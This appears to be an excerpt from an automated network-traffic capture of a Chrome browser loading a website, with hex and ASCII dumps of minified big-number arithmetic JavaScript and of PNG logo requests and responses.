                                                                          2023-12-10 16:44:49 UTC538INData Raw: 2a 3d 69 29 68 2b 2b 3b 68 2d 2d 2c 6e 3d 6e 2f 69 7c 30 3b 66 6f 72 28 76 61 72 20 65 3d 74 2e 6c 65 6e 67 74 68 2d 72 2c 6f 3d 65 25 68 2c 73 3d 4d 61 74 68 2e 6d 69 6e 28 65 2c 65 2d 6f 29 2b 72 2c 61 3d 30 2c 6c 3d 72 3b 6c 3c 73 3b 6c 2b 3d 68 29 61 3d 75 28 74 2c 6c 2c 6c 2b 68 2c 69 29 2c 74 68 69 73 2e 69 6d 75 6c 6e 28 6e 29 2c 74 68 69 73 2e 77 6f 72 64 73 5b 30 5d 2b 61 3c 36 37 31 30 38 38 36 34 3f 74 68 69 73 2e 77 6f 72 64 73 5b 30 5d 2b 3d 61 3a 74 68 69 73 2e 5f 69 61 64 64 6e 28 61 29 3b 69 66 28 30 21 3d 3d 6f 29 7b 76 61 72 20 6d 3d 31 3b 66 6f 72 28 61 3d 75 28 74 2c 6c 2c 74 2e 6c 65 6e 67 74 68 2c 69 29 2c 6c 3d 30 3b 6c 3c 6f 3b 6c 2b 2b 29 6d 2a 3d 69 3b 74 68 69 73 2e 69 6d 75 6c 6e 28 6d 29 2c 74 68 69 73 2e 77 6f 72 64 73 5b 30
                                                                          Data Ascii: *=i)h++;h--,n=n/i|0;for(var e=t.length-r,o=e%h,s=Math.min(e,e-o)+r,a=0,l=r;l<s;l+=h)a=u(t,l,l+h,i),this.imuln(n),this.words[0]+a<67108864?this.words[0]+=a:this._iaddn(a);if(0!==o){var m=1;for(a=u(t,l,t.length,i),l=0;l<o;l++)m*=i;this.imuln(m),this.words[0
                                                                          2023-12-10 16:44:49 UTC4744INData Raw: 70 65 2e 63 6c 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6e 65 77 20 65 28 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 6f 70 79 28 74 29 2c 74 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 65 78 70 61 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 74 68 69 73 2e 6c 65 6e 67 74 68 3c 74 3b 29 74 68 69 73 2e 77 6f 72 64 73 5b 74 68 69 73 2e 6c 65 6e 67 74 68 2b 2b 5d 3d 30 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 74 72 69 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 3b 74 68 69 73 2e 6c 65 6e 67 74 68 3e 31 26 26 30 3d 3d 3d 74 68 69 73 2e 77 6f 72 64 73 5b 74 68 69 73 2e 6c 65 6e 67 74 68 2d 31 5d 3b 29 74 68 69 73 2e 6c 65 6e 67 74 68 2d 2d 3b 72 65 74 75 72 6e
                                                                          Data Ascii: pe.clone=function(){var t=new e(null);return this.copy(t),t},e.prototype._expand=function(t){for(;this.length<t;)this.words[this.length++]=0;return this},e.prototype._strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return
                                                                          2023-12-10 16:44:49 UTC5930INData Raw: 6e 20 74 68 69 73 2e 74 65 73 74 6e 28 74 2d 31 29 3f 74 68 69 73 2e 6e 6f 74 6e 28 74 29 2e 69 61 64 64 6e 28 31 29 2e 69 6e 65 67 28 29 3a 74 68 69 73 2e 63 6c 6f 6e 65 28 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 4e 65 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 21 3d 3d 74 68 69 73 2e 6e 65 67 61 74 69 76 65 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 65 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 6c 6f 6e 65 28 29 2e 69 6e 65 67 28 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 65 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 5a 65 72 6f 28 29 7c 7c 28 74 68 69 73 2e 6e 65 67 61 74 69 76 65 5e 3d 31 29 2c 74 68 69 73 7d 2c 65 2e 70 72 6f 74 6f 74 79
                                                                          Data Ascii: n this.testn(t-1)?this.notn(t).iaddn(1).ineg():this.clone()},e.prototype.isNeg=function(){return 0!==this.negative},e.prototype.neg=function(){return this.clone().ineg()},e.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},e.prototy
                                                                          2023-12-10 16:44:49 UTC7116INData Raw: 2c 74 74 29 7c 30 29 2b 4d 61 74 68 2e 69 6d 75 6c 28 66 2c 24 29 7c 30 29 29 3c 3c 31 33 29 7c 30 3b 61 3d 28 28 65 3d 65 2b 4d 61 74 68 2e 69 6d 75 6c 28 66 2c 74 74 29 7c 30 29 2b 28 6e 3e 3e 3e 31 33 29 7c 30 29 2b 28 74 79 3e 3e 3e 32 36 29 7c 30 2c 74 79 26 3d 36 37 31 30 38 38 36 33 2c 68 3d 4d 61 74 68 2e 69 6d 75 6c 28 78 2c 50 29 2c 6e 3d 28 6e 3d 4d 61 74 68 2e 69 6d 75 6c 28 78 2c 46 29 29 2b 4d 61 74 68 2e 69 6d 75 6c 28 42 2c 50 29 7c 30 2c 65 3d 4d 61 74 68 2e 69 6d 75 6c 28 42 2c 46 29 2c 68 3d 68 2b 4d 61 74 68 2e 69 6d 75 6c 28 6b 2c 44 29 7c 30 2c 6e 3d 28 6e 3d 6e 2b 4d 61 74 68 2e 69 6d 75 6c 28 6b 2c 48 29 7c 30 29 2b 4d 61 74 68 2e 69 6d 75 6c 28 41 2c 44 29 7c 30 2c 65 3d 65 2b 4d 61 74 68 2e 69 6d 75 6c 28 41 2c 48 29 7c 30 2c 68
                                                                          Data Ascii: ,tt)|0)+Math.imul(f,$)|0))<<13)|0;a=((e=e+Math.imul(f,tt)|0)+(n>>>13)|0)+(ty>>>26)|0,ty&=67108863,h=Math.imul(x,P),n=(n=Math.imul(x,F))+Math.imul(B,P)|0,e=Math.imul(B,F),h=h+Math.imul(k,D)|0,n=(n=n+Math.imul(k,H)|0)+Math.imul(A,D)|0,e=e+Math.imul(A,H)|0,h
                                                                          2023-12-10 16:44:49 UTC8302INData Raw: 2c 74 70 29 7c 30 29 29 3c 3c 31 33 29 7c 30 3b 61 3d 28 28 65 3d 65 2b 4d 61 74 68 2e 69 6d 75 6c 28 42 2c 74 4d 29 7c 30 29 2b 28 6e 3e 3e 3e 31 33 29 7c 30 29 2b 28 74 5a 3e 3e 3e 32 36 29 7c 30 2c 74 5a 26 3d 36 37 31 30 38 38 36 33 2c 68 3d 4d 61 74 68 2e 69 6d 75 6c 28 6a 2c 74 65 29 2c 6e 3d 28 6e 3d 4d 61 74 68 2e 69 6d 75 6c 28 6a 2c 74 6f 29 29 2b 4d 61 74 68 2e 69 6d 75 6c 28 43 2c 74 65 29 7c 30 2c 65 3d 4d 61 74 68 2e 69 6d 75 6c 28 43 2c 74 6f 29 2c 68 3d 68 2b 4d 61 74 68 2e 69 6d 75 6c 28 7a 2c 74 75 29 7c 30 2c 6e 3d 28 6e 3d 6e 2b 4d 61 74 68 2e 69 6d 75 6c 28 7a 2c 74 61 29 7c 30 29 2b 4d 61 74 68 2e 69 6d 75 6c 28 54 2c 74 75 29 7c 30 2c 65 3d 65 2b 4d 61 74 68 2e 69 6d 75 6c 28 54 2c 74 61 29 7c 30 2c 68 3d 68 2b 4d 61 74 68 2e 69 6d
                                                                          Data Ascii: ,tp)|0))<<13)|0;a=((e=e+Math.imul(B,tM)|0)+(n>>>13)|0)+(tZ>>>26)|0,tZ&=67108863,h=Math.imul(j,te),n=(n=Math.imul(j,to))+Math.imul(C,te)|0,e=Math.imul(C,to),h=h+Math.imul(z,tu)|0,n=(n=n+Math.imul(z,ta)|0)+Math.imul(T,tu)|0,e=e+Math.imul(T,ta)|0,h=h+Math.im
                                                                          2023-12-10 16:44:49 UTC3480INData Raw: 5b 6e 2b 72 5d 29 2b 73 29 3e 3e 32 36 2c 74 68 69 73 2e 77 6f 72 64 73 5b 6e 2b 72 5d 3d 36 37 31 30 38 38 36 33 26 65 3b 69 66 28 30 3d 3d 3d 73 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 73 74 72 69 70 28 29 3b 66 6f 72 28 68 28 2d 31 3d 3d 3d 73 29 2c 73 3d 30 2c 6e 3d 30 3b 6e 3c 74 68 69 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 73 3d 28 65 3d 2d 28 30 7c 74 68 69 73 2e 77 6f 72 64 73 5b 6e 5d 29 2b 73 29 3e 3e 32 36 2c 74 68 69 73 2e 77 6f 72 64 73 5b 6e 5d 3d 36 37 31 30 38 38 36 33 26 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 65 67 61 74 69 76 65 3d 31 2c 74 68 69 73 2e 5f 73 74 72 69 70 28 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 77 6f 72 64 44 69 76 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 76 61 72 20 72 2c 68 3d 74 68 69 73 2e 6c 65
                                                                          Data Ascii: [n+r])+s)>>26,this.words[n+r]=67108863&e;if(0===s)return this._strip();for(h(-1===s),s=0,n=0;n<this.length;n++)s=(e=-(0|this.words[n])+s)>>26,this.words[n]=67108863&e;return this.negative=1,this._strip()},e.prototype._wordDiv=function(t,i){var r,h=this.le
                                                                          2023-12-10 16:44:50 UTC10674INData Raw: 70 6e 28 31 29 3e 30 3b 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 2c 6c 3d 31 3b 28 72 2e 77 6f 72 64 73 5b 30 5d 26 6c 29 3d 3d 30 26 26 61 3c 32 36 3b 2b 2b 61 2c 6c 3c 3c 3d 31 29 3b 69 66 28 61 3e 30 29 66 6f 72 28 72 2e 69 75 73 68 72 6e 28 61 29 3b 61 2d 2d 20 3e 30 3b 29 6f 2e 69 73 4f 64 64 28 29 26 26 6f 2e 69 61 64 64 28 75 29 2c 6f 2e 69 75 73 68 72 6e 28 31 29 3b 66 6f 72 28 76 61 72 20 6d 3d 30 2c 66 3d 31 3b 28 6e 2e 77 6f 72 64 73 5b 30 5d 26 66 29 3d 3d 30 26 26 6d 3c 32 36 3b 2b 2b 6d 2c 66 3c 3c 3d 31 29 3b 69 66 28 6d 3e 30 29 66 6f 72 28 6e 2e 69 75 73 68 72 6e 28 6d 29 3b 6d 2d 2d 20 3e 30 3b 29 73 2e 69 73 4f 64 64 28 29 26 26 73 2e 69 61 64 64 28 75 29 2c 73 2e 69 75 73 68 72 6e 28 31 29 3b 72 2e 63 6d 70 28 6e 29 3e 3d 30 3f 28 72 2e
                                                                          Data Ascii: pn(1)>0;){for(var a=0,l=1;(r.words[0]&l)==0&&a<26;++a,l<<=1);if(a>0)for(r.iushrn(a);a-- >0;)o.isOdd()&&o.iadd(u),o.iushrn(1);for(var m=0,f=1;(n.words[0]&f)==0&&m<26;++m,f<<=1);if(m>0)for(n.iushrn(m);m-- >0;)s.isOdd()&&s.iadd(u),s.iushrn(1);r.cmp(n)>=0?(r.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          90192.168.2.54982375.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:49 UTC651OUTGET /_ipx/w_64,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=64&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:50 UTC411INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 35 30 39 32 33 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 39 37 35 2d 7a 33
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 50923Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 2421Content-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:44:50 GMTEtag: "975-z3
                                                                          2023-12-10 16:44:50 UTC775INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 03 00 00 00 9d b7 81 ec 00 00 00 a8 50 4c 54 45 4c 69 71 54 57 55 96 9c a3 81 86 89 5b 5d 5c a7 a9 a9 53 56 56 3f 43 44 37 3a 3b 52 53 50 91 96 98 47 4c 4b 56 59 59 6d 73 78 44 48 48 78 7f 83 81 88 8f 8f 96 9d 6e 74 78 57 5d 61 60 65 68 1e 21 20 20 23 22 23 25 23 1c 1f 1e 27 2a 29 1a 1c 1b 24 27 27 2a 2c 2d 26 27 25 54 59 5b 59 5e 61 4f 53 55 5e 64 67 47 4b 4c 4a 4f 51 16 18 16 2e 31 31 63 69 6c 43 47 48 3b 3f 40 70 75 78 69 6e 72 90 94 98 96 9a 9e 32 35 36 76 7b 7e 7c 81 84 a0 a4 a8 81 86 8a a5 a9 ad 11 10 0e 88 8d 8f 9b a0 a3 ab af b2 b5 b9 bd 24 a7 57 9b 00 00 00 15 74 52 4e 53 00 7e 8f 66 2d 1f ac fe fe 55 42 e2 c6 a8 c9 86 e9 ce dd eb f0 0c cb 73 54 00 00 00 09 70 48 59 73 00
                                                                          Data Ascii: PNGIHDR@@PLTELiqTWU[]\SVV?CD7:;RSPGLKVYYmsxDHHxntxW]a`eh! #"#%#'*)$''*,-&'%TY[Y^aOSU^dgGKLJOQ.11cilCGH;?@puxinr256v{~|$WtRNS~f-UBsTpHYs
                                                                          2023-12-10 16:44:50 UTC1646INData Raw: 5d b3 c9 a0 a8 be 27 71 db 69 6b 4f 0c 96 6f 2b 5e b5 2d af 5a 80 41 08 c5 8c 88 c3 d8 6d db a8 30 e7 b4 06 0e ea 9a b2 e4 90 7f fc 0e 40 db 5e 36 57 f5 ec 30 da 8a 52 f0 47 c1 eb b1 5f 0e cb 61 26 94 f3 9a 52 52 e7 3f ca 21 ff ad 96 b7 9d ee fd 89 83 78 db b6 e5 12 10 70 2e 25 95 2c 0e 9d 0d aa 3f 40 04 55 56 12 48 ac eb 9a d7 a4 54 28 5e 79 7c f8 64 6d c0 22 ab 1f 16 af ab 4a 72 0e 0d 44 24 4c 86 60 d5 e1 b0 2c 87 59 7b 4e 32 ae ba aa 39 31 0e 99 5d 0c 77 9d 0e fe 94 c1 f3 bc 34 e7 40 9d a4 04 b7 9d b5 f6 30 2b 65 bb ae ef 42 40 2c 13 03 95 a0 a5 42 66 67 e1 73 b0 9d 14 99 79 be d3 0f 4d c4 1a 26 b1 54 7d 08 87 6e ee ad 5d 0e db 16 5a 91 eb 40 29 2c e4 5d fc 03 3a fb 61 d1 21 9c 24 08 40 66 00 d0 7e 9c c5 7e 1b 92 e0 c8 f4 cb 3c 0c 5b d7 87 10 68 03 4a
                                                                          Data Ascii: ]'qikOo+^-ZAm0@^6W0RG_a&RR?!xp.%,?@UVHT(^y|dm"JrD$L`,Y{N291]w4@0+eB@,BfgsyM&T}n]Z@),]:a!$@f~~<[hJ


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          91192.168.2.54982475.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC653OUTGET /_ipx/w_256,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=256&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:50 UTC413INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 35 30 39 32 33 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 36 63 31 30 2d
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 50923Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 27664Content-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:44:50 GMTEtag: "6c10-
                                                                          2023-12-10 16:44:50 UTC773INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 03 00 00 00 6b ac 58 54 00 00 00 bd 50 4c 54 45 4c 69 71 8f 8e 8b 2e 2a 24 37 33 2c 87 84 81 69 68 61 6c 6d 67 2f 2b 2c 4b 49 42 51 4c 48 4f 4e 47 af ae a9 2c 29 22 b0 ac a6 22 24 23 1c 1f 1e 24 26 24 20 22 21 1e 21 1f 26 28 27 19 1c 1b 29 2a 28 28 2b 2c 5c 62 66 2c 2e 2e 43 46 46 11 10 0e 45 4a 4c 38 3c 3e 16 17 15 3c 40 41 4a 4e 50 4d 52 56 62 67 6b 58 5d 61 7c 81 84 83 88 8a 52 58 5c 89 8e 91 75 7b 7e 2f 32 34 6a 6e 6f 8e 94 98 71 75 76 94 9a 9e 3d 43 47 34 38 39 9a 9f a2 9c a3 a9 54 56 55 a3 a7 aa ac b0 b3 a6 ab b0 66 70 7b 62 62 5f b2 b5 b9 b9 bd c1 c3 c8 cc 79 86 94 54 60 6e d3 d7 da eb ee f0 a7 b4 c1 8c e6 58 64 00 00 00 0e 74 52 4e 53 00 c0 76 a7 70 9a cf 14 58 32 d5 fb da
                                                                          Data Ascii: PNGIHDRkXTPLTELiq.*$73,ihalmg/+,KIBQLHONG,)""$#$&$ "!!&(')*((+,\bf,..CFFEJL8<><@AJNPMRVbgkX]a|RX\u{~/24jnoquv=CG489TVUfp{bb_yT`nXdtRNSvpX2
                                                                          2023-12-10 16:44:50 UTC2372INData Raw: 87 c9 a8 4f ff 17 42 c3 cb e7 df ef 3f 86 f6 92 a6 a9 d6 1a a6 5f d1 0f be fe b4 f0 54 f0 59 db 33 c7 52 79 33 e8 17 cd a9 d4 e9 a9 69 8a a2 2c ca a2 2a ab aa 12 69 d9 cb f4 22 de c6 7f 79 33 f8 fa 69 bd df df d2 be 4f 61 f5 f8 04 4f 8f 1d b0 ab c7 5e c0 cc f1 65 ac 18 06 80 0d c0 eb 44 7b 50 c2 47 36 55 53 96 05 f6 a0 11 a2 11 69 01 af b0 11 6f d3 6c 3e fd eb 86 85 97 cf 9f ce 3f 86 cb 7b 25 34 af fe e7 e1 93 1f b4 b1 4f d0 a6 f0 c6 58 1f 50 c1 ff 8b 92 ee 83 dd 0d 5c 85 1c 37 a1 49 f1 75 38 84 46 34 fd 5b fb 56 7f fa ed e5 5f d6 f6 cd 45 8b ca 9e 3d bf ac cb e7 c3 af 04 5b 82 86 27 ac d2 5e 97 d7 f4 d4 94 f0 8a 58 f1 09 cb b5 17 a3 69 9a 02 46 50 96 d5 09 0e a1 28 ca a6 a8 7a 38 8a b7 e1 5f f0 26 bc 7c fe 76 fb 31 bc b5 a9 a6 73 e7 d3 4f d9 02 e0 f3 78
                                                                          Data Ascii: OB?_TY3Ry3i,*i"y3iOaO^eD{PG6USiol>?{%4OXP\7Iu8F4[V_E=['^XiFP(z8_&|v1sOx
                                                                          2023-12-10 16:44:50 UTC538INData Raw: b9 08 5f 51 e4 52 20 74 83 20 f0 90 e7 ba 6e c4 07 ea 07 d8 0f 22 8a c2 98 12 e6 30 70 dd 00 4b 05 6f 88 6f 0d 10 fe 82 d0 0b d8 1b 24 09 fe 90 e7 45 bb 83 1c 7b 94 53 f3 3c df 6c 10 0b 8a bc 52 7f c7 1d f8 fa fb fd 4d 13 fc fd 08 82 bd 32 a5 cd 7a 77 ae 0f 83 45 ae 1b 76 99 77 ad a5 94 75 8b 97 6c f5 de 49 b2 2e dc f4 ad 94 b2 ef 65 db eb 22 f3 93 20 ee db be c7 0f ad b5 be ee 5d c7 cb fa 5e 27 4e 78 ed b5 2e 82 24 f6 e2 30 76 8a b6 df bb 8e 1f 6d ae 57 fa 73 54 2d b8 66 70 0d 59 e0 c5 31 c5 90 30 f4 82 5d f7 36 f4 84 09 ad 17 00 65 aa fe 6e 7e e0 e5 d3 8f b7 4b fb cc 7f c8 fd 55 d2 e4 f6 fa 47 81 ef c5 0e c1 3a f8 be d8 9c a7 69 34 66 18 cc 34 8d 93 d9 87 5d 78 5d 97 79 9a ce a3 99 ce d3 34 d5 5d 10 76 cb 80 d7 38 1a 63 8c 52 57 df 3f 8e 6f 2a db 15 67
                                                                          Data Ascii: _QR t n"0pKoo$E{S<lRM2zwEvwulI.e" ]^'Nx.$0vmWsT-fpY10]6en~KUG:i4f4]x]y4]v8cRW?o*g
                                                                          2023-12-10 16:44:50 UTC4744INData Raw: b1 81 4f b7 81 88 ef 27 03 98 36 ba 6e 6c ea 13 01 a4 22 20 85 38 fc e4 b5 3b 76 59 3d 8c af 5b 4a dc a3 dd d6 0c 43 16 d4 66 b8 44 5b e6 fa 77 5b 3d 4c 62 7b 1c 8c 71 b6 01 bc db 6e 5b 29 75 dd be 1a 65 60 01 f5 75 77 91 f2 ea 7b 71 e6 d2 06 bc 8e 72 dc db 6f a6 97 4b e4 89 8f 30 10 7a 94 40 11 8b 10 44 87 be 02 6f 4e b1 b0 6c f2 4d 71 ad f4 ff 3c 2f f8 7c 9f 2e 92 88 7f 5b f7 af 2a 5d da cc 37 0a 2c 1e 01 b7 13 32 01 d0 d5 66 dc 07 5d 1c 66 71 1c e7 93 31 8e a3 86 a1 d8 c2 61 85 89 93 b9 62 18 c4 f6 75 52 26 71 33 22 c4 7c 61 8c d8 be 2a a9 b2 a8 31 4a 6f bb b6 ad 8b 20 f4 fc 8b 51 a7 ed c1 d4 a3 13 e1 ac 91 50 76 1d 90 24 81 61 3f 8e 41 ab c6 c4 25 21 51 8c 5e 2f 57 2d 38 1a 36 f4 a9 a9 fe c7 99 d1 e7 e5 d6 56 fd e5 49 fa 61 fd 7d c3 f5 4d 98 bf 87 b4
                                                                          Data Ascii: O'6nl" 8;vY=[JCfD[w[=Lb{qn[)ue`uw{qroK0z@DoNlMq</|.[*]7,2f]fq1abuR&q3"|a*1Jo QPv$a?A%!Q^/W-86VIa}M
                                                                          2023-12-10 16:44:50 UTC5930INData Raw: 22 95 fb e0 75 17 05 28 1e 51 21 8c 4d 0b 90 10 ad 47 dc 56 41 04 1e ed 00 6c c0 77 de db a2 c4 45 c2 7f 79 f3 17 e8 d1 17 35 49 e8 a1 08 91 69 a1 2f a4 84 f3 60 d1 f1 aa cd 00 00 20 00 49 44 41 54 fa 9c fe 32 e6 c7 9a 61 04 61 92 1d c3 18 37 3e 43 9d 98 fc 1c 71 33 54 f2 24 c5 0e f9 44 62 3f e8 dd 39 89 63 5b c6 02 2f 0a b3 1c a7 4f c5 77 ba d8 d5 64 c6 d6 94 ad 54 35 4e 1f 23 f6 d2 aa 28 21 21 42 36 dc d6 50 17 3c 53 e4 22 3a c6 bb 08 54 39 22 80 43 3c b3 4d b0 b9 46 80 20 08 09 62 c6 06 00 13 c8 e5 69 bf d9 9f 4e 64 02 7f 49 46 fc 79 9d 58 10 8e 8f 5e 33 0a 0e 38 06 86 5d 17 13 12 20 25 3f 79 3d ce 75 b8 1e 14 7a 89 e3 65 d4 f1 8a 76 58 db 02 45 69 1b 65 6d d4 05 4c 45 1d 06 c2 54 cf 78 2d e1 dc b5 10 0d 5c 7b 55 0d 4a a5 6b d3 d4 ad c1 dc 98 53 71 3a
                                                                          Data Ascii: "u(Q!MGVAlwEy5Ii/` IDAT2aa7>Cq3T$Db?9c[/OwdT5N#(!!B6P<S":T9"C<MF biNdIFyX^38] %?y=uzevXEiemLETx-\{UJkSq:
                                                                          2023-12-10 16:44:50 UTC7116INData Raw: b1 17 40 1c 40 91 60 59 a6 65 bd f5 62 fc 26 41 86 60 8f fd 18 97 80 85 41 b0 f2 18 07 40 08 8c da 92 a9 83 e0 c9 0a 30 36 78 d6 87 61 01 fe 5b 9f d2 8c 29 20 c1 0d 6d 00 59 80 bd 05 05 e8 00 d4 ad b9 c0 4a 57 c9 8e c3 21 19 2c 31 b1 5e 8c 84 c7 c9 a8 20 4f f9 20 cd 2b a0 0b 00 f5 53 96 2a a3 4d 5b 4f 83 51 b2 14 48 82 8d 6a af 74 c8 f3 0c 9a 94 c6 ee da c1 ba 14 1e f1 3f c2 c6 13 6c 64 9a 41 a0 9a 79 be 01 13 9d 87 f6 a8 be 3f da 23 69 a3 a8 1e 00 a0 61 3b c5 f9 bd d1 81 d0 e9 23 20 58 96 06 27 f6 87 16 4a 10 44 b4 01 05 69 c5 20 93 28 71 05 be b4 ef f6 79 b7 65 53 9e e0 03 92 8c a8 2e 6e cc e6 2e 24 8b 02 f0 05 9a 05 8e 8d c8 42 f4 6b 5a b1 3a de 14 9e 00 82 37 78 6c eb be 96 3d 4d 0f 33 7d d5 cf eb 59 d6 f2 3a 4e d8 00 d3 c2 12 28 13 80 57 c4 d0 b5 01
                                                                          Data Ascii: @@`Yeb&A`A@06xa[) mYJW!,1^ O +S*M[OQHjt?ldAy?#ia;# X'JDi (qyeS.n.$BkZ:7xl=M3}Y:N(W
                                                                          2023-12-10 16:44:50 UTC6191INData Raw: db 2f 51 26 dd ed 68 e9 6c 51 58 b7 6e 36 99 5e 17 c9 73 ac b3 d1 bc d3 f3 4e aa 35 18 02 e2 02 09 7f 03 b8 82 87 1d 3f 0a 00 1a 29 93 15 64 20 4c d5 eb ce 8c c8 08 42 05 e8 cc 7c 63 eb e4 6d 09 19 e0 dd 8c 7d dd 9b 43 e2 d3 18 7e 42 c2 a4 01 e1 7c b0 39 66 69 88 a8 7b 2a 55 65 75 b0 f6 f8 f2 61 37 87 a5 84 1f c6 d3 93 85 09 04 72 b2 13 2b e6 9d 37 43 50 1a 26 da 28 d5 2a 55 c1 1f 6e 4a 63 9b d9 73 18 36 e3 06 5e 25 61 ae d2 ad cf 57 c6 03 6a d4 c1 c4 63 ae b8 a4 f9 19 95 a3 32 51 17 3b 76 4e 87 11 6b 5a 1c 0f 51 5b 7f be 5a e0 72 ee 1f db 5c f1 ca 72 f2 88 6c b1 64 21 10 4d c0 6f 5c 34 12 8d 0e e5 ba 0d 82 f9 83 60 b1 99 cf 36 49 dc f4 63 9f cd a3 79 18 51 